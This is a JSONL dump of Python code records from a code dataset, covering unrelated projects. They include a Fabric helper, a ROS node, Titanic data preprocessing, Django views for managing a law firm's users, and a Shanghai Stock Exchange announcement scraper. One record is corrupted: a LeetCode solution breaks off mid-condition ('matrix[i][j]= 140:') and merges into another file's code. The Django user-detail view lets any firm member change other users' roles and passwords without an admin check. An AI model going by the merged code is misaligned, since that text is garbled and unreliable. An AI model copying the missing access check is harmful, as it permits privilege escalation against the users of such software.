self.add_event(Event(TestUser.get_default_random_event_time(), self.suspects.get_random_event_type()))\n for i in range(num_symptoms):\n self.add_event(Event(TestUser.get_default_random_event_time(), self.symptoms.get_random_event_type()))\n\nmike = TestUser('mike')\nmike.add_random_events_for_day(4000, 300)\nmike.analyze_symptoms()\nprint(str(mike))\n\n\n","sub_path":"pykos/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":12802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"527307956","text":"# -*- coding: utf-8 -*-\nimport json\n\nfrom fabric.api import env\n\nfrom .exceptions import EnvironmentNotDefinedError\nfrom .tasks import ulocal\n\n\ndef set_env(env_name, json_path):\n \"\"\"\n Creates a dynamic environment based on the contents of the given\n json_path. Note that a this task relies on a \"vagrant\" environment defined\n on your environments json file to populate the task's env with the proper\n Vagrant's identity file.\n\n This task must be used to create your own envionment task in your fabfile,\n for example:\n\n # /path/to/my/environments/file.json\n {\n \"vagrant\": {\n \"some_property\": \"some_value\",\n \"another_property\": \"another_value\"\n },\n \"staging\": {\n ...\n }\n }\n\n\n # fabfile.py\n from fabric.api import task\n from fabutils.env import set_env\n\n\n @task\n def environment(env_name):\n set_env(env_name, '/path/to/my/environments/file.json')\n\n @task\n def some_task():\n ...\n\n\n And call it as follows:\n\n fab envinronment:vagrant some_task\n \"\"\"\n with open(json_path, 'r') as data:\n try:\n environment = json.load(data)[env_name]\n\n except KeyError:\n raise EnvironmentNotDefinedError(\n \"The environment '{0}' is not defined in file '{1}'\".format(\n env_name, json_path\n )\n )\n\n # Update the env with the Vagrant's identity file if the given env_name is\n # \"vagrant\" and no key_filename property is defined in the current env.\n if env_name == 'vagrant' and 'key_filename' not in environment:\n result = ulocal('vagrant ssh-config | grep IdentityFile', capture=True)\n env.key_filename = result.split()[1].replace('\"', '')\n\n # Prepend the command \"source\" to each one of the commands defined in the\n # command_prefixes property of the json file.\n prefixes = environment.get('command_prefixes', [])\n sourced_prefixes = map(lambda p: 'source %s' % p, prefixes)\n environment.update(command_prefixes=sourced_prefixes)\n\n env.update(environment)\n","sub_path":"fabutils/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"139591860","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\nimport rospy\n\nfrom std_msgs.msg import Float32MultiArray, String\n\n\nclass EnemyPosFromScore:\n def __init__(self):\n topic_ws = str(rospy.get_param(\"~topic_ws\"))\n\n self.side = str(rospy.get_param(\"~side\"))\n\n self.pub = rospy.Publisher(NODE_NAME, Float32MultiArray, queue_size=1)\n\n self.old = {}\n self.new = {}\n\n self.points = INIT_POINTS[self.side]\n\n rospy.Subscriber(topic_ws, String, self.ws_callback)\n\n def execute(self):\n rate = int(rospy.get_param(\"~rate\"))\n\n r = rospy.Rate(rate)\n\n while not rospy.is_shutdown():\n self.publish()\n\n r.sleep()\n\n def publish(self):\n msg = Float32MultiArray()\n\n msg.data, self.points = calc_posmap(\n self.side, self.points, self.old, self.new)\n\n self.old = self.new\n\n self.pub.publish(msg)\n\n def ws_callback(self, data):\n self.new = json_to_targets(json.loads(data.data))\n\n\ndef json_to_targets(json_data):\n targets = {}\n\n for data in json_data[\"targets\"]:\n targets[data[\"name\"]] = data[\"player\"]\n\n return targets\n\n\ndef calc_posmap(side, points, old, new):\n diff = diff_of_targets(old, new)\n\n points = calc_points(side, points, diff)\n\n posmap = points_to_posmap(points)\n\n return posmap, points\n\n\ndef diff_of_targets(old, new):\n diff = {}\n\n for name in old:\n if (name in new) and (old[name] != new[name]):\n diff[name] = new[name]\n\n else:\n diff[name] = \"u\"\n\n return diff\n\n\ndef calc_points(side, points, diff):\n if INV_SIDE[side] in diff.values():\n points = init_points(side, diff)\n\n else:\n points = open_points(points)\n\n return points\n\n\ndef points_to_posmap(points):\n s = sum(points)\n\n if s <= 0:\n return [0 for _ in points]\n\n return [x / s for x in points]\n\n\ndef init_points(side, diff):\n points = [0 for _ in range(CELLS)]\n\n names = [k for k, v in diff.items() if v == INV_SIDE[side]]\n\n for name in names:\n if name in POINT_MAPPING:\n for i in POINT_MAPPING[name]:\n points[i] = 1\n\n return points\n\n\ndef open_points(points):\n clone = points[:]\n\n for i in range(CELLS):\n d = clone[i] * K_OPEN_POINTS\n\n points[i] -= d * len(NEXT_CELL_MAPPING[i])\n\n for j in NEXT_CELL_MAPPING[i]:\n points[j] = max(points[j], clone[j] + d)\n\n return points\n\n\nNODE_NAME = \"enemy_pos_from_score\"\n\n\nCELLS = 24\n\n\nK_OPEN_POINTS = 0.05\n\n\nINV_SIDE = {\n \"r\": \"b\",\n \"b\": \"r\"\n}\n\n\nINIT_POINTS = {}\n\nINIT_POINTS[\"r\"] = [\n 1, 1,\n 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0,\n 0, 0\n]\n\nINIT_POINTS[\"b\"] = [\n 0, 0,\n 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0,\n 1, 1\n]\n\n\nPOINT_MAPPING = eval(\"\"\"\n{\n \"FriedShrimp_N\": [ 8, 9],\n \"FriedShrimp_W\": [ 8, 14],\n \"FriedShrimp_E\": [ 9, 15],\n \"FriedShrimp_S\": [14, 15],\n \"Tomato_N\": [ 2, 3],\n \"Tomato_S\": [ 7, 8],\n \"Omelette_N\": [ 4, 5],\n \"Omelette_S\": [ 9, 10],\n \"Pudding_N\": [13, 14],\n \"Pudding_S\": [18, 19],\n \"OctopusWiener_N\": [15, 16],\n \"OctopusWiener_S\": [20, 21]\n}\n\"\"\")\n\n\nNEXT_CELL_MAPPING = eval(\"\"\"\n[\n [ 1, 3],\n [ 0, 4],\n [ 3, 7],\n [ 0, 2, 4, 8],\n [ 1, 3, 5, 9],\n [ 4, 10],\n [ 7, 12],\n [ 2, 6, 8, 13],\n [ 3, 7, 9, 14],\n [ 4, 8, 10, 15],\n [ 5, 9, 11, 16],\n [10, 17],\n [ 6, 13],\n [ 7, 12, 14, 18],\n [ 8, 13, 15, 19],\n [ 9, 14, 16, 20],\n [10, 15, 17, 21],\n [11, 16],\n [13, 19],\n [14, 18, 20, 22],\n [15, 19, 21, 23],\n [16, 20],\n [19, 23],\n [20, 22]\n]\n\"\"\")\n\n\nif __name__ == \"__main__\":\n rospy.init_node(NODE_NAME)\n\n node = EnemyPosFromScore()\n\n node.execute()\n","sub_path":"burger_war_dev/scripts/enemy_pos_from_score.py","file_name":"enemy_pos_from_score.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"460723105","text":"class Solution:\n def luckyNumbers (self, matrix: List[List[int]]) -> List[int]:\n number=[]\n for i in range (len(matrix)):\n j= matrix[i].index(min(matrix[i]))\n \n for k in range (0,len(matrix)):\n if matrix[i][j]= 140:\n backjump()\n continue\n else:\n numchars += 1 + len(word)\n sentence.append(word)\n prev = curr\n curr = word\n output = \" \".join(sentence)\n\n# we leave ! and ? since they make sense isolated\noutput = [w.translate(str.maketrans('', '', '\"()[]{}«»¡¿')) for w in output.split()]\noutput = \" \".join(output)\n\np = xml.sax.saxutils.unescape(output)\nprint(p)\n\nwith open(\"archive/\"+sys.argv[1]+\"/past\", 'a+') as f:\n f.write(p+\"\\n\")\n","sub_path":"scripts/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"100221183","text":"\"\"\"\nScript to preprocess the kaggle titanic dataset.\n\"\"\"\nimport pandas as pd\n\nimport tools\n\npd.set_option('display.width', 800)\n\n\ndef main(ratio):\n \"\"\"\n Preprocess the data.\n \"\"\"\n # Load the raw data\n raw_data_df = load_raw_data(path_raw_data=\"data/titanic/raw_data/data.csv\")\n # Study data\n study_data(raw_data_df)\n # Transform the data\n train_data_df, test_data_df = process(raw_data_df, ratio)\n # Study transformed data\n study_data(train_data_df)\n # Store the data\n store(train_data_df, path_preprocessed_data=\"data/titanic/train_data.pkl\")\n store(test_data_df, path_preprocessed_data=\"data/titanic/test_data.pkl\")\n\n\ndef load_raw_data(path_raw_data):\n \"\"\"Load the raw data.\"\"\"\n raw_data_df = pd.read_csv(\n path_raw_data,\n nrows=10000,\n )\n return raw_data_df\n\n\ndef study_data(data_df):\n \"\"\"\n Examine the data.\n \"\"\"\n # Display shape\n print(\"- shape :\\n{}\\n\".format(data_df.shape))\n # Display data dataframe (raws and columns)\n print(\"- dataframe :\\n{}\\n\".format(data_df.head(10)))\n # Display types\n print(\"- types :\\n{}\\n\".format(data_df.dtypes))\n # Missing values\n print(\"- missing values :\\n{}\\n\".format(data_df.isnull().sum()))\n\n\n@tools.debug\ndef process(raw_data_df, ratio):\n \"\"\"\n Process the data so it can be used by the mdoel\n \"\"\"\n # Select a subset of columns\n data_df = raw_data_df[[\n \"Pclass\",\n \"Fare\",\n \"Age\",\n \"SibSp\",\n \"Parch\",\n \"Survived\"]]\n # Convert to dtype float\n for attribute in data_df.columns:\n data_df[attribute] = raw_data_df[attribute].astype(float)\n # Drop all the NaN value\n data_df.dropna(inplace=True)\n # Change output\n data_df[\"Survived\"] = data_df[\"Survived\"].apply(\n lambda x: float(-1) if x == float(0) else x)\n # Sample\n data_df = data_df.sample(frac=1,\n replace=True,\n random_state=2).reset_index(drop=True)\n alpha = int(len(data_df)*ratio)\n # Separate\n train_data_df = data_df.iloc[:alpha, :]\n test_data_df = data_df.iloc[alpha:, :]\n # Return value.\n return train_data_df, test_data_df\n\n\ndef store(data_df, path_preprocessed_data):\n \"\"\"Store the processed data.\"\"\"\n data_df.to_pickle(\n path_preprocessed_data,\n )\n","sub_path":"data/titanic/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439374189","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django.utils.timezone import utc\nfrom utils.utils import custom_redirect\nimport datetime\n\nfrom .models import Kanzlei\nfrom login.models import ConventecUser\n\nfrom django.contrib.auth.models import User\n\ndef kanzlei_view(request, kanzlei_id):\n \"\"\"\n Redirects user to if not authenticated, otherwise shows kanzlei view\n \"\"\"\n \n #Redirect unauthenticated users\n if not request.user.is_authenticated:\n return redirect('index:index')\n \n #Check if user has accepted terms of use\n if not request.user.conventecuser.accepted_tou:\n return redirect('terms:terms')\n \n if request.user.conventecuser.kanzlei.deadline is not None and request.user.conventecuser.kanzlei.deadline <= datetime.datetime.now():\n return custom_redirect('login:error', e = 'deadline')\n \n #Check if user is admin\n if not request.user.conventecuser.role == 'admin':\n return redirect('index:index')\n \n #Get Kanzlei\n kanzlei = Kanzlei.objects.get(id = int(kanzlei_id))\n \n #Redirect if user not in kanzlei\n if request.user.conventecuser.kanzlei.id != kanzlei.id:\n return redirect('index:index')\n\n \n #Provide name of user and items the user has access to\n context = {\n 'user' : request.user,\n 'active' : {'nav' : 'kanzlei'}\n }\n \n return render(request, 'kanzlei.html', context)\n\ndef kanzlei_user(request, kanzlei_id):\n \"\"\"\n Redirects user to if not authenticated, otherwise shows users of kanzlei\n \"\"\"\n \n #Redirect unauthenticated users\n if not request.user.is_authenticated:\n return redirect('index:index')\n \n #Check if user has accepted terms of use\n if not request.user.conventecuser.accepted_tou:\n return redirect('terms:terms')\n \n #Get Kanzlei\n kanzlei = Kanzlei.objects.get(id = kanzlei_id)\n \n #Redirect if user not in kanzlei\n if request.user.conventecuser.kanzlei.id != kanzlei.id:\n return redirect('index:index')\n \n if request.method == 'GET':\n #Get sorted and reverse\n sorted_by = request.GET.get('sort', 'l_name')\n reverse = (request.GET.get('reverse', '') == 'true')\n \n vorname = request.GET.get('vorname', '')\n nachname = request.GET.get('nachname', '')\n email = request.GET.get('email', '')\n position = request.GET.get('position', '')\n role = request.GET.get('role', '')\n \n e = request.GET.get('e', False)\n\n \n #Provide name of user and items the user has access to\n context = {\n 'user' : request.user,\n 'kanzlei' : request.user.conventecuser.kanzlei,\n 'members' : list_all_members(request, sorted_by, reverse),\n 'active' : {'nav' : 'kanzlei'},\n 'vorname' : vorname,\n 'nachname' : nachname,\n 'email' : email,\n 'position' :position,\n 'role' : role,\n 'e' : e\n }\n \n return render(request, 'kanzlei_user.html', context)\n \n elif request.method == 'POST':\n if not request.user.conventecuser.role == 'admin':\n return redirect('index:index')\n \n vorname = request.POST.get('vorname', False)\n nachname = request.POST.get('nachname', False)\n email = request.POST.get('email', False)\n position = request.POST.get('position', False)\n role = request.POST.get('role', False)\n pw1 = request.POST.get('pw1', False)\n pw2 = request.POST.get('pw2', False)\n \n remove = request.POST.get('remove', False)\n \n if vorname and nachname and email and position and role and pw1 and pw2 and pw1 == pw2:\n # Check if email is already taken\n\n try:\n user = User.objects.get(email = email)\n return custom_redirect('kanzlei:kanzlei_user', kanzlei.id, e = 'email', vorname = vorname, nachname = nachname, position = position, role = role, scroll_to = 'erstellen')\n except User.DoesNotExist:\n pass\n \n new_user = ConventecUser.create(vorname, nachname, email, position, role, pw1, kanzlei)\n \n if remove:\n user = User.objects.get(id = int(remove))\n if user.conventecuser.kanzlei.id == kanzlei.id:\n user.delete()\n \n return redirect('kanzlei:kanzlei_user', kanzlei.id)\n \ndef kanzlei_user_detail(request, kanzlei_id, user_id):\n \"\"\"\n Redirects user to if not authenticated, otherwise shows users of kanzlei\n \"\"\"\n \n #Redirect unauthenticated users\n if not request.user.is_authenticated:\n return redirect('index:index')\n \n #Check if user has accepted terms of use\n if not request.user.conventecuser.accepted_tou:\n return redirect('terms:terms')\n \n #Get Kanzlei\n kanzlei = Kanzlei.objects.get(id = int(kanzlei_id))\n \n #Get User\n user = User.objects.get(id = int(user_id))\n \n #Redirect if user not in kanzlei\n if request.user.conventecuser.kanzlei.id != kanzlei.id or user.conventecuser.kanzlei.id != kanzlei.id:\n return redirect('index:index')\n \n if request.method == 'GET':\n \n s = request.GET.get('s', False)\n\n #Provide name of user and items the user has access to\n context = {\n 'user' : user,\n 'kanzlei' : request.user.conventecuser.kanzlei,\n 'active' : {'nav' : 'kanzlei'},\n 's' : s\n }\n \n return render(request, 'kanzlei_user_detail.html', context)\n \n elif request.method == 'POST':\n \n vorname = request.POST.get('vorname', False)\n nachname = request.POST.get('nachname', False)\n email = request.POST.get('email', False)\n position = request.POST.get('position', False)\n role = request.POST.get('role', False)\n pw1 = request.POST.get('pw1', False)\n pw2 = request.POST.get('pw2', False)\n \n if vorname:\n user.first_name = vorname\n user.save()\n \n if nachname:\n user.last_name = nachname\n user.save()\n \n if email:\n if email != user.email:\n try:\n user = User.objects.get(email = email)\n return custom_redirect('kanzlei:kanzlei_user_detail', kanzlei.id, user.id, s = 'fail', scroll_to = 'bearbeiten')\n except User.DoesNotExist:\n pass\n user.email = email\n user.save()\n \n if pw1 and pw2 and pw1 == pw2:\n user.set_password(pw1)\n user.save()\n \n if position:\n user.conventecuser.position = position\n user.conventecuser.save()\n \n if role:\n user.conventecuser.role = role\n user.conventecuser.save()\n \n \n return custom_redirect('kanzlei:kanzlei_user_detail', kanzlei.id, user.id, s = 'success', scroll_to = 'bearbeiten')\n\ndef list_all_members(request, sorted_by, reverse):\n \"\"\"\n Lists all users of a kanzlei.\n List can be sorted by: name, role, position.\n \"\"\"\n users = request.user.conventecuser.kanzlei.conventecuser_set.all()\n \n #Return sorted list\n if sorted_by == 'f_name':\n return sorted(users, key=lambda x: x.user.first_name, reverse=reverse)\n elif sorted_by == 'l_name':\n return sorted(users, key=lambda x: x.user.last_name, reverse=reverse)\n elif sorted_by == 'position':\n return sorted(users, key=lambda x: x.position, reverse=reverse)\n elif sorted_by == 'role':\n return sorted(users, key=lambda x: x.role, reverse=reverse)\n else:\n return users\n","sub_path":"kanzlei/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"85937353","text":"class Solution(object):\n def combine(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n if n < k : return []\n elif n == k: \n return [range(1,n+1)]\n else:\n nums = range(1,n+1)\n path = []\n self.res = []\n self.DFS(nums, 0, k, path)\n return self.res\n \n def DFS(self, nums, index, k, path):\n if k == 0:\n self.res.append(path)\n return\n elif index > len(nums) - 1:\n return \n else:\n for i in xrange(index, len(nums)-k+1):\n self.DFS(nums, i+1, k-1, path+[nums[i]])\n return","sub_path":"77_combinations/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"464163617","text":"import json\nimport pytest\n\n\npytestmark = pytest.mark.usefixtures(\"master\", \"minion\", \"minion_key_accepted\")\n\n\nPRE_SLE12 = [\n ['0.2-1', '0.2~beta1-1', '-1'],\n ['0.2~beta2-1', '0.2-1', '1']\n]\n\n\nPOST_SLE12 = [\n ['0.2-1', '0.2~beta1-1', '1'],\n ['0.2~beta2-1', '0.2-1', '-1']\n]\n\n\ndef pytest_generate_tests(metafunc):\n VERSIONS = [\n ['0.2-1', '0.2-1', '0'],\n ['0.2-1.0', '0.2-1', '1'],\n ['0.2.0-1', '0.2-1', '1'],\n ['0.2-1', '1:0.2-1', '-1'],\n ['1:0.2-1', '0.2-1', '1'],\n ] + PRE_SLE12 + POST_SLE12\n metafunc.parametrize(\"params\", VERSIONS)\n\n\ndef check_params(major, params):\n if (\n (major >= 12 and params in PRE_SLE12) or\n (major < 12 and params in POST_SLE12)\n ):\n pytest.skip(\"not for this version\")\n\n\ndef test_pkg_compare(params, minion):\n info = minion['container'].get_suse_release()\n major, minor = info['VERSION'], info['PATCHLEVEL']\n\n check_params(major, params)\n\n [ver1, ver2, expected] = params\n\n command = \"salt-call pkg.version_cmp {0} --output=json -l quiet\".format(\n ' '.join([ver1, ver2])\n )\n raw = minion['container'].run(command)\n assert json.loads(raw)['local'] == int(expected)\n","sub_path":"tests/test_pkg_compare.py","file_name":"test_pkg_compare.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"317596115","text":"from __main__ import *\nimport yt\n\ndef getTime( ds, iter, cutoff=5.0 ) :\n\n\ttime = ds.current_time\n\tratio = time / frameskip / (iter + 1)\n\n\tif ratio > cutoff :\n\t\tlabel = 'day'\n\telse :\n\t\tlabel = 'hr'\n\n\ttime = time.in_units(label)\n\n\treturn time, label\n\ndef getEnt( ds ) :\n\tad = ds.all_data()\n\tK = ds.arr(1.0,'K')\n\tg = ds.arr(1.0,'g')\n\tcl = ds.arr(1.0,'code_length')\n\n\tT = ad[('gas','temperature')]/K\n\tmass = ad[('gas','cell_mass')]/g\n\tV = ad[('gas','cell_volume')]/cl/cl/cl\n\n\tent = R * ( 5./2. + np.log( np.divide(V,mass) / R /h/h/h * k**2.5 * np.power( 2. * math.pi * mpart * T, 1.5 ) ) )\n\n\treturn ent\n\ndef getEnt2( ds ) :\n\tad = ds.all_data()\n\tK = ds.arr(1.0,'K')\n\tg = ds.arr(1.0,'g')\n\tcl = ds.arr(1.0,'code_length')\n\n\tT = ad[('gas','temperature')]/K\n\tmass = ad[('gas','cell_mass')]/g\n\tV = ad[('gas','cell_volume')]/cl/cl/cl\n\trho = np.divide(mass, V)\n\n\tent = R * np.divide(T, np.power(rho, gamma-1) )\n\n\treturn ent\n\ndef getEnt3( ds ) :\n\tad = ds.all_data()\n\tK = ds.arr(1.0,'K')\n\tg = ds.arr(1.0,'g')\n\tcl = ds.arr(1.0,'code_length')\n\n\tie = ad[('Gas','ie')]\n\trho = ad[('Gas','rho')]\n\n\tT = ad[('Gas','Temperature')]\n\tie = gamma/(gamma-1.) * R * T\n\n\tent = (gamma-1) * np.divide(ie, np.power(rho, gamma-1) )\n\n\treturn ent\n","sub_path":"timestuff.py","file_name":"timestuff.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"339354333","text":"#encoding=utf8\n#上交所上市公司最新公告\nimport sys,uuid,re,urllib\nimport urllib2,time\nimport mysqlUtliCRUD\nimport traceback,json\nfrom lxml import etree\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nuser_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','Referer'\nuser_referer = 'http://www.sse.com.cn/disclosure/listedinfo/announcement/'\nheaders = {'User-Agent': user_agent,'referer':user_referer}\n\n\ndef get_value(n1,n2): #设定post值\n value = {'jsonCallBack':'jsonpCallback36635',\n 'isPagination':'true',\n 'productId':n1,\n 'keyWord':'',\n 'isNew':1,\n 'reportType2':'',\n 'reportType':'ALL',\n 'beginDate':'2017-01-01',\n 'endDate':'2018-04-04',\n 'pageHelp.pageSize':25,\n 'pageHelp.pageCount':50,\n 'pageHelp.pageNo':n2,\n 'pageHelp.beginPage':1,\n 'pageHelp.cacheSize':1,\n 'pageHelp.endPage':5,\n '_':1522659844167}\n return value\n\ndef get_content(str1,str2):\n try:\n siteType='0'\n url = 'http://query.sse.com.cn/security/stock/queryCompanyStatementNew.do?' #上市公司最新公告\n value = get_value(str1,str2)\n data = urllib.urlencode(value) # 把key-value这样的键值对转换成我们想要的格式\n request_1 = urllib2.Request(url, data, headers=headers)\n response_1 = urllib2.urlopen(request_1)\n page_z = response_1.read()\n page_z = page_z.replace('jsonpCallback36635(', '').replace(')', '')\n html = json.loads(page_z)\n value = html[\"pageHelp\"]\n data = value['data']\n str_time1 = time.strftime(\"%Y-%m-%d\", time.localtime(time.time())) # 添加新闻时间\n list1 = []\n list2 = []\n for i in data:\n SSEDate=i['SSEDate']\n date1 = SSEDate\n #if 0==0:\n if date1 == str_time1:\n try:\n URL_s = i['URL']\n title = i['title']\n url_2 = 'http://www.sse.com.cn'+URL_s\n url_2 = str(url_2).encode('utf8')\n new_code = uuid.uuid3(uuid.NAMESPACE_DNS, url_2)\n new_code = str(new_code).replace('-', '').encode('utf8')\n upURL = url\n absURL = url_2\n website = '上海证券交易所(上市公司最新公告)'\n source = website\n author = '未知'\n publish_time = date1 + ' 00:00:00'\n crawl_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(time.time())) # 爬取数据时间\n summary = title\n downloadDate = crawl_time\n spider_person = 'cyz'\n if (url_2.find('.doc') > 0):\n fileType = 'doc'\n elif (url_2.find('.DOC') > 0):\n fileType = 'doc'\n elif (url_2.find('.pdf') > 0):\n fileType = 'pdf'\n elif (url_2.find('.PDF') > 0):\n fileType = 'pdf'\n else:\n fileType = 'none'\n fileAddress = url_2\n fileParsing = 0\n data_1 = [siteType, new_code, title, upURL, absURL, website, source, author, publish_time, crawl_time, summary,\n downloadDate, spider_person, fileType, fileAddress, fileParsing]\n list1.append(data_1)\n except:\n URL_s = i['URL']\n url_2 = 'http://www.sse.com.cn' + URL_s\n omit = '%s--------%s' % (str_time1, url_2) + '\\n'\n try_log = open('sjs_sgg_%s.log' %(str_time1), 'a')\n try_log.write(omit)\n try_log.close()\n mysqlUtliCRUD.mysqlUtil('insert ignore into gbi_pd_news_match(siteType,new_code,title,upURL,absURL,website,source,author,publish_time,crawl_time,summary,downloadDate,spider_person,fileType,fileAddress,fileParsing) \\\n values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)', list1).addbatchmysql()\n except:\n f = open(\"sjs_sgg.log\", 'a')\n traceback.print_exc(file=f)\n f.flush()\n f.close()\n\n\n\n\n\ndef get_code():\n aa = mysqlUtliCRUD.mysqlUtil('select sjs_code,sjs_gsjc from sjs_gs',0).getmysql()\n for i in aa:\n sjs_code =i[0]\n for m in xrange(1,100):\n try:\n get_content(sjs_code,m)\n except:\n pass\n\n\nget_code()\n","sub_path":"pycharm/wpf/dongfangzhenquan/cyz/SJS_SGG2.py","file_name":"SJS_SGG2.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"301810862","text":"import wx\nimport os, re, sys, copy, string\nfrom os.path import join\nimport json, shutil, glob\n\nfrom datetime import datetime \nfrom copy import deepcopy\nfrom pprint import pprint as pp\nfrom ui.include.log_init import info, debug\nfrom ui.include.utils import dict2, exception\nfrom ui.include.common import *\n\ne=sys.exit\n\nimport ui.config.ui_config as ui_config \nuic = ui_config.uic\n\nfrom ui.include.Config import Config\nfrom ui.include.Layout import Layout\n\n\n\nclass UiLayout(Config): \n\n def __init__(self, pipeline):\n \n Config.__init__(self)\n self.cfg = None\n self.pref=None\n self.ppl=pipeline\n self.layout_dir=self.getLayoutDir()\n #self.build_loc = join(UI_TMP_DIR, BUILD_DIR, BUILD_FN )\n self.build_tmpl_loc = join(uic.root, UI_DIR, INCLUDE_DIR, BUILD_DIR, BUILD_TMPL_FN )\n @exception\n def loadLayout(self):\n global cfg\n \n self.layout_fn = self.getLayoutFile()\n self.layout_name = self.getLayoutName()\n \n\n self.layout_loc= join(uic.root, self.layout_fn)\n\n assert os.path.isfile(self.layout_loc), 'UI layout does not exists\\n%s\\n%s' % (self.layout_loc,self.layout_fn)\n cfg=load_config(config_path = self.layout_loc)\n return cfg\n\n def getLayoutDir(self):\n\n \n out = join (os.getcwd(),UI_DIR,PIPELINE_DIR, self.ppl)\n\n assert out\n return out\n \n \n def getLayoutFile(self):\n\n \n out = join (os.getcwd(),UI_DIR,PIPELINE_DIR, self.ppl, self.getLayoutName())\n\n assert out\n return out\n def getLayoutName(self):\n \n out = self.ppl.split(os.path.sep)[-1]\n\n assert out\n return '%s.json' % out\n \n def getNode_LayoutRoot(self, nref, ntype):\n api = getattr(sbc, 'get%sRoot' % ntype)\n return os.path.join(api(nref),self.LAYOUT_DIR)\n \n \n def getAllLayouts(self, pref):\n \n\n out={}\n for k, ntype in self.ntypes.items():\n if k in pref: \n out.update(self.getNode_LayoutList(pref, ntype))\n \n return out\n\n def getNode_LayoutList(self, pref, ntype):\n api = getattr(self,'get%sCopyRef' % ntype)\n nref = api(pref)\n layout_root = self.getNode_LayoutRoot(nref, ntype)\n return {os.path.relpath(file,self.root):nref for file in glob.glob(os.path.join(layout_root, JSON_EXT))}\n\n\n\n \n \n def assertExists(self):\n assert os.path.isdir(self.cfg_root), 'Config root does not exists for app \"%s\"' % self.app_name\n assert os.path.isdir(self.layout_root), 'Layout root does not exists for app \"%s\"\\n%s' % (self.app_name,self.layout_root)\n return self\n \n \n def getLayoutList(self):\n return [os.path.basename(file) for file in glob.glob(os.path.join(self.layout_root, JSON_EXT))]\n\n\n\n \n def get(self, key, default = None):\t\n global cfg\n if not 'cfg' in globals():\n self.cfg=cfg=self.loadLayout()\n\n return self.cfg.get(key, default)\n \n def items(self):\n \n global cfg\n if not 'cfg' in globals():\n self.cfg=cfg=self.loadLayout()\n return [(k,v) for k, v in cfg.items() if not k.startswith('_')]\n\n def keys(self):\n \n global cfg\n if 'cfg' in globals():\n return cfg.keys()\n else:\n \n cfg=self.loadLayout()\n return cfg.keys()\n","sub_path":"ui_layer/UiLayout.py","file_name":"UiLayout.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"479010038","text":"import argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('inputs',type=argparse.FileType('r'))\nparser.add_argument('output',type=argparse.FileType('w'))\nargs = parser.parse_args()\n\ndef swapsgn(sign):\n if sign == '+':\n return '-'\n else:\n return '+'\n\ndef rotate(l,lastid):\n if len(l) == 1:\n l[0] = swapsgn(l[0])\n else:\n for i in xrange(lastid,0,-1):\n l[i-1] = swapsgn(l[i-1])\n\ncase = 0\nnext(args.inputs)\nfor inp in args.inputs:\n inp = list(inp.rstrip('\\n'))\n count = 0\n count = 0\n while not all('+' == v for v in inp):\n lastid = len(inp) - inp[::-1].index('-')\n rotate(inp,lastid)\n count += 1\n case += 1\n args.output.write((\"Case #%i: %s\\n\")%(case,count))\n","sub_path":"codes/CodeJamCrawler/16_0_2/Richman/pancakes.py","file_name":"pancakes.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"521205759","text":"import argparse\nimport json\nimport codecs\nimport os\nimport itertools\nfrom collections import defaultdict\nfrom nltk import word_tokenize, sent_tokenize\nfrom string import punctuation\n\ndef main(datadir):\n\tmegadict = defaultdict(lambda: {})\n\tfor filename in os.listdir(datadir):\n\t\tsplit_name = filename.split('_')\n\t\tyear = split_name[0]\n\t\telection_type = split_name[1].split('.')[0]\n\t\tf = codecs.open(datadir + '/' + filename, 'r', encoding='utf-8')\n\t\tdata = json.load(f)\n\t\tf.close()\n\t\tfor name, v in dict.iteritems(data):\n\t\t\tfor date, text in dict.iteritems(v):\n\t\t\t\tsentences = sent_tokenize(\"\".join(text))\n\t\t\t\ttext = ''.join(sentences)\n\t\t\t\telection_name = name + \" \" + election_type + \" \" + year\n\t\t\t\tif election_name != \"Hillary Clinton republican 2008\":\n\t\t\t\t\tmegadict[election_name][date] = text\n\tnewf = codecs.open('full_text.json' , 'w', encoding='utf-8')\n\tnewf.write(json.dumps(megadict))\n\tnewf.close()\n\nif __name__ == 